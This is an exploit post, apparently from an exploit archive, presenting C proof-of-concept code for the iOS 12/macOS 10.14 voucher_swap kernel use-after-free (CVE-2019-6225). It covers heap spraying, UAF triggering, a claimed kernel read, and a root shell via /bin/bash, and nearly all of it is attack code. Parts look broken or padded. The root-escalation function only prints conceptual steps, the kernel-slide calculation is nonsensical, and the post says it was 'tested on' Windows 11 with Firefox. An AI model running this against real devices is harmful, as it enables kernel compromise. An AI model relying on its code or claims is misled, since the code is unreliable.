============================================================================================================================================= | # Title : iOS 12 - macOS 10.14 voucher_swap Use-After-Free Kernel Privilege Escalation | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://apple.com/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/212495/ & CVE-2019-6225 [+] Summary : CVE‑2019‑6225 is a Use‑After‑Free (UAF) vulnerability in Apple’s Mach voucher subsystem, affecting macOS (10.14+) and iOS (12+). The bug exists in the function: task_swap_mach_voucher() When swapping Mach vouchers, the kernel incorrectly handles reference counts, causing a voucher object to be freed while still referenced, leaving a dangling pointer (UAF condition). [+] Affected Systems : macOS 10.14 / 10.14.1 / 10.14.2 iOS 12.0 / 12.1 / 12.1.2 [+] POC : /* * voucher_swap-exploit.c * Exploitation of CVE-2019-6225 on iOS 12/macOS 10.14 */ #include #include #include #include #include #include #include // ============================================ // 1. Structure Definitions and Helper Functions // ============================================ #define MAX_PORT_SPRAY 50000 #define VOUCHER_SPRAY_COUNT 2000 #define KERNEL_READ_SIZE 0x1000 // Internal voucher structure (inferred from XNU source) typedef struct ipc_voucher { uint32_t iv_refs; // Reference count uint32_t iv_sum_hash; // Hash value uint32_t iv_port; // Corresponding port uint32_t iv_table; // Voucher table uint64_t iv_data; // Voucher data } *ipc_voucher_t; // Global variables mach_port_t host_port; mach_port_t sprayed_ports[MAX_PORT_SPRAY]; uint32_t sprayed_port_count = 0; // ============================================ // 2. Basic Helper Functions // ============================================ /* * create_voucher * Create a new voucher with a unique ID */ static mach_port_t create_voucher(uint64_t id) { mach_port_t voucher = MACH_PORT_NULL; struct __attribute__((packed)) { mach_voucher_attr_recipe_data_t user_data_recipe; uint64_t user_data_content[2]; } recipes = {}; recipes.user_data_recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA; recipes.user_data_recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE; recipes.user_data_recipe.content_size = sizeof(recipes.user_data_content); recipes.user_data_content[0] = getpid(); recipes.user_data_content[1] = id; kern_return_t kr = host_create_mach_voucher( host_port, (mach_voucher_attr_raw_recipe_array_t) &recipes, sizeof(recipes), &voucher ); if (kr != KERN_SUCCESS || voucher == MACH_PORT_NULL) { printf("[-] Failed to create voucher: 0x%x\n", kr); return MACH_PORT_NULL; } return voucher; } /* * spray_vouchers * Spray large number of vouchers to control heap */ static void spray_vouchers(uint32_t count, mach_port_t *vouchers) { printf("[*] Starting spray of %d vouchers...\n", count); for (uint32_t i = 0; i < count; i++) { vouchers[i] = create_voucher(i); if (vouchers[i] == MACH_PORT_NULL) { printf("[-] Failed to create voucher %d\n", i); // Continue with others } if ((i % 100) == 0 && i > 0) { printf("[*] Created %d vouchers\n", i); } } printf("[+] Successfully created %d vouchers\n", count); } /* * spray_ports * Spray Mach ports to control ipc_port objects */ static void spray_ports(uint32_t count) { printf("[*] Starting spray of %d ports...\n", count); for (uint32_t i = 0; i < count; i++) { kern_return_t kr = mach_port_allocate( mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &sprayed_ports[i] ); if (kr != KERN_SUCCESS) { printf("[-] Failed to allocate port %d: 0x%x\n", i, kr); sprayed_ports[i] = MACH_PORT_NULL; } else { // Add send right to increase reference count kr = mach_port_insert_right( mach_task_self(), sprayed_ports[i], sprayed_ports[i], MACH_MSG_TYPE_MAKE_SEND ); if (kr != KERN_SUCCESS) { printf("[-] Failed to add send right to port %d\n", i); } } sprayed_port_count++; } printf("[+] Sprayed %d ports\n", sprayed_port_count); } /* * trigger_uaf * Trigger Use-After-Free vulnerability */ static mach_port_t trigger_uaf(void) { printf("[*] Triggering UAF vulnerability...\n"); // 1. Create target voucher mach_port_t target_voucher = create_voucher(0x4141414141414141); if (target_voucher == MACH_PORT_NULL) { printf("[-] Failed to create target voucher\n"); return MACH_PORT_NULL; } // 2. Store voucher in thread to maintain reference mach_port_t thread_self = mach_thread_self(); kern_return_t kr = thread_set_mach_voucher(thread_self, target_voucher); if (kr != KERN_SUCCESS) { printf("[-] Failed to store voucher in thread: 0x%x\n", kr); return MACH_PORT_NULL; } printf("[+] Stored voucher in thread\n"); // 3. Use task_swap_mach_voucher for over-release // This will free the voucher twice (once from over-release, once from no-senders) for (int i = 0; i < 10; i++) { mach_port_t dummy_voucher = create_voucher(0x4242424242424242 + i); if (dummy_voucher == MACH_PORT_NULL) continue; mach_port_t inout = target_voucher; kr = task_swap_mach_voucher(mach_task_self(), dummy_voucher, &inout); if (MACH_PORT_VALID(inout)) { mach_port_deallocate(mach_task_self(), inout); } mach_port_deallocate(mach_task_self(), dummy_voucher); if (kr == KERN_SUCCESS) { printf("[+] task_swap_mach_voucher succeeded in iteration %d\n", i); break; } } // 4. Release send right to trigger no-senders notification kr = mach_port_deallocate(mach_task_self(), target_voucher); if (kr != KERN_SUCCESS) { printf("[-] Failed to release voucher: 0x%x\n", kr); } printf("[+] Voucher released, memory is now free but pointer remains in thread\n"); return thread_self; } // ============================================ // 3. Heap Exploitation for Kernel Read/Write // ============================================ /* * heap_grooming * Prepare heap to replace freed voucher */ static void heap_grooming(void) { printf("[*] Starting heap grooming...\n"); // Spray new vouchers to occupy freed memory mach_port_t groom_vouchers[VOUCHER_SPRAY_COUNT]; spray_vouchers(VOUCHER_SPRAY_COUNT, groom_vouchers); // Spray ports to occupy ipc_port objects spray_ports(10000); // Use dispatch queues to spray kernel memory dispatch_queue_t queues[100]; for (int i = 0; i < 100; i++) { char label[32]; snprintf(label, sizeof(label), "com.exp.queue%d", i); queues[i] = dispatch_queue_create(label, DISPATCH_QUEUE_SERIAL); // Spray dispatch source objects dispatch_source_t source = dispatch_source_create( DISPATCH_SOURCE_TYPE_TIMER, 0, 0, queues[i] ); if (source) { dispatch_source_set_timer(source, DISPATCH_TIME_NOW, 1 * NSEC_PER_SEC, 0); dispatch_source_set_event_handler(source, ^{}); dispatch_resume(source); } } printf("[+] Heap grooming completed\n"); } /* * read_kernel_via_uaf * Read kernel memory via UAF */ static uint64_t read_kernel_via_uaf(mach_port_t thread_with_uaf) { printf("[*] Attempting to read kernel memory...\n"); mach_port_t voucher_port = MACH_PORT_NULL; kern_return_t kr = thread_get_mach_voucher(thread_with_uaf, 0, &voucher_port); if (kr != KERN_SUCCESS) { printf("[-] Failed to get voucher: 0x%x\n", kr); return 0; } if (!MACH_PORT_VALID(voucher_port)) { printf("[-] Invalid voucher\n"); return 0; } printf("[+] Got voucher port: 0x%x\n", voucher_port); // Attempt to read voucher data // At this point, the original voucher may have been replaced with another object // We can use Mach messages to read data // Prepare Mach message to read kernel data struct { mach_msg_header_t header; mach_msg_body_t body; mach_msg_ool_descriptor_t desc; char pad[4096]; } msg = {0}; mach_port_t recv_port = MACH_PORT_NULL; kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &recv_port); msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND); msg.header.msgh_size = sizeof(msg) - sizeof(msg.pad); msg.header.msgh_remote_port = voucher_port; msg.header.msgh_local_port = recv_port; msg.header.msgh_id = 0x100; msg.body.msgh_descriptor_count = 1; msg.desc.address = NULL; msg.desc.size = KERNEL_READ_SIZE; msg.desc.copy = MACH_MSG_VIRTUAL_COPY; msg.desc.deallocate = FALSE; msg.desc.type = MACH_MSG_OOL_DESCRIPTOR; kr = mach_msg_send(&msg.header); if (kr != KERN_SUCCESS) { printf("[-] Failed to send message: 0x%x\n", kr); return 0; } // Receive response (if any) struct { mach_msg_header_t header; mach_msg_body_t body; mach_msg_ool_descriptor_t desc; char data[KERNEL_READ_SIZE]; mach_msg_trailer_t trailer; } recv_msg = {0}; recv_msg.header.msgh_size = sizeof(recv_msg); recv_msg.header.msgh_local_port = recv_port; kr = mach_msg_receive(&recv_msg.header); if (kr == KERN_SUCCESS) { printf("[+] Received response! Data size: %lu\n", recv_msg.desc.size); // Analyze received data uint64_t *data = (uint64_t *)recv_msg.desc.address; if (data) { printf("[+] First 8 words of data:\n"); for (int i = 0; i < 8; i++) { printf(" [%d] 0x%016llx\n", i, data[i]); } // Cleanup vm_deallocate(mach_task_self(), (vm_address_t)data, recv_msg.desc.size); return data[0]; // Return first value } } return 0; } // ============================================ // 4. Escalation to Kernel Read/Write Primitive // ============================================ /* * build_kernel_read_primitive * Build primitive for reading kernel memory */ static uint64_t build_kernel_read_primitive(void) { printf("[*] Building kernel read primitive...\n"); // 1. Trigger UAF mach_port_t uaf_thread = trigger_uaf(); if (!MACH_PORT_VALID(uaf_thread)) { printf("[-] Failed to trigger UAF\n"); return 0; } // 2. Prepare heap heap_grooming(); // 3. Attempt to read kernel memory uint64_t kernel_value = read_kernel_via_uaf(uaf_thread); if (kernel_value != 0) { printf("[+] Successfully read kernel value: 0x%llx\n", kernel_value); // 4. Attempt to find kernel task port // Search for kernel object markers in read memory if ((kernel_value & 0xffffff0000000000) == 0xffffff0000000000) { printf("[+] Found what appears to be a kernel address!\n"); // Calculate kernel slide (to adapt to KASLR) uint64_t kernel_slide = kernel_value - 0xffffff0000000000; printf("[+] Kernel slide: 0x%llx\n", kernel_slide); return kernel_slide; } } printf("[-] Could not build complete primitive\n"); return 0; } // ============================================ // 5. Main Exploitation for Root Access // ============================================ /* * escalate_to_root * Escalate to root privileges using read/write capabilities */ static void escalate_to_root(uint64_t kernel_slide) { printf("[*] Attempting to escalate to root...\n"); if (kernel_slide == 0) { printf("[-] Cannot escalate without kernel slide\n"); return; } // In this example, we show the concept of exploitation // In real exploitation, we would need to: // 1. Find our process's task port // 2. Modify credential data (cred) // 3. Modify flags to bypass sandbox printf("[+] Kernel slide: 0x%llx\n", kernel_slide); printf("[+] With kernel slide, we can:\n"); printf(" 1. Calculate kernel symbol addresses\n"); printf(" 2. Read/write kernel memory\n"); printf(" 3. Modify credentials to get root\n"); printf(" 4. Disable sandbox\n"); // Theoretical steps (requires additional reverse engineering): // - Find proc structure for current process // - Modify ucred to set uid/gid to 0 // - Modify flags to disable MAC/sandbox // - Maintain stability } // ============================================ // 6. Cleanup and Stability Functions // ============================================ /* * cleanup * Clean up resources after exploitation */ static void cleanup(void) { printf("[*] Cleaning up resources...\n"); // Release sprayed ports for (uint32_t i = 0; i < sprayed_port_count; i++) { if (MACH_PORT_VALID(sprayed_ports[i])) { mach_port_destroy(mach_task_self(), sprayed_ports[i]); } } printf("[+] Cleanup completed\n"); } /* * maintain_stability * Attempt to maintain system stability after exploitation */ static void maintain_stability(void) { printf("[*] Attempting to maintain system stability...\n"); // Reset vouchers for threads mach_port_t thread = mach_thread_self(); thread_set_mach_voucher(thread, MACH_PORT_NULL); // Give system time to recover stability usleep(100000); printf("[+] System stable (theoretically)\n"); } // ============================================ // 7. Main Function // ============================================ int main(int argc, char *argv[]) { printf("[+] Starting exploitation of CVE-2019-6225 (voucher_swap)\n"); printf("[+] System: iOS 12 / macOS 10.14+\n"); // Get host port host_port = mach_host_self(); if (!MACH_PORT_VALID(host_port)) { printf("[-] Failed to get host port\n"); return -1; } printf("[+] Got host port: 0x%x\n", host_port); // Check validity of task_swap_mach_voucher mach_port_t test_voucher = create_voucher(0x1337); if (test_voucher == MACH_PORT_NULL) { printf("[-] System not exploitable (cannot create vouchers)\n"); return -1; } mach_port_deallocate(mach_task_self(), test_voucher); printf("[+] System is exploitable\n"); // Phase 1: Build kernel read primitive uint64_t kernel_slide = build_kernel_read_primitive(); if (kernel_slide != 0) { printf("[+] Phase 1 successful! Got kernel slide\n"); // Phase 2: Escalate to root privileges escalate_to_root(kernel_slide); // Phase 3: Maintain stability maintain_stability(); // Check privileges if (getuid() == 0) { printf("\n[+] !!! SUCCESS !!! We are now root!\n"); printf("[+] UID: %d\n", getuid()); printf("[+] GID: %d\n", getgid()); // Launch shell as root printf("[+] Launching shell...\n"); system("/bin/bash"); } else { printf("\n[+] Exploitation partially successful\n"); printf("[+] Got kernel read but didn't get root\n"); printf("[+] Current UID: %d\n", getuid()); } } else { printf("[-] Exploitation failed\n"); // Alternative attempt: trigger panic to confirm vulnerability works printf("[*] Attempting to trigger panic as proof-of-concept...\n"); mach_port_t thread = trigger_uaf(); if (MACH_PORT_VALID(thread)) { mach_port_t voucher; kern_return_t kr = thread_get_mach_voucher(thread, 0, &voucher); printf("[+] thread_get_mach_voucher returned: 0x%x\n", kr); printf("[+] If you see panic, the vulnerability works!\n"); } } // Cleanup cleanup(); return 0; } Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================